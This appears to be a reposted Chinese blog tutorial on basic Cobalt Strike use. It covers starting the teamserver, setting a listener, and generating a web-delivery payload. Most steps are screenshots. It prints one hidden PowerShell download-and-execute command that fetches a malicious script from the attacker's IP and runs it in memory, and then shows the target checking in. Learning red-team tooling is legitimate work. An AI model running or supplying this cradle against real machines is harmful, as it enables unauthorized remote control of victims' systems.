【知识积累】Cobalt Strike基本操作

admin 2022年1月10日03:32:54评论87 views字数 403阅读1分20秒阅读模式

前言

一、基础了解CS

启动CS

基本架构是C/S,所以得先启动服务器

image-20210829113459470

然后连接上去

image-20210829113533498

这是界面

image-20210829113607062

kali里面也可以使用命令启动

image-20210829114227211

让目标连接上teamserver

1、设置监听器

image-20210829115024046

image-20210829115228611

2、生成攻击载荷,在钓鱼攻击里面的脚本web传递

image-20210829115102770

①url 它是个文件路径

②就是让目标通过这个地址和端口下载恶意脚本

③目标机子运行

image-20210829115854163

得到payload

1
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.0.101:26240/a'))"

访问:26240/a路径的ip会发现有恶意代码

image-20210829120336420

这份代码就是 powershell运行 加载到内存执行

3、目标机执行payload

image-20210829120754957

接着就上线cs了

image-20210829120818237

image-20210829121110889

二、个人博客

孤桜懶契:http://gylq.gitee.io

FROM:gylq.gitee Author:孤桜懶契

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月10日03:32:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【知识积累】Cobalt Strike基本操作https://cn-sec.com/archives/730002.html

发表评论

匿名网友 填写信息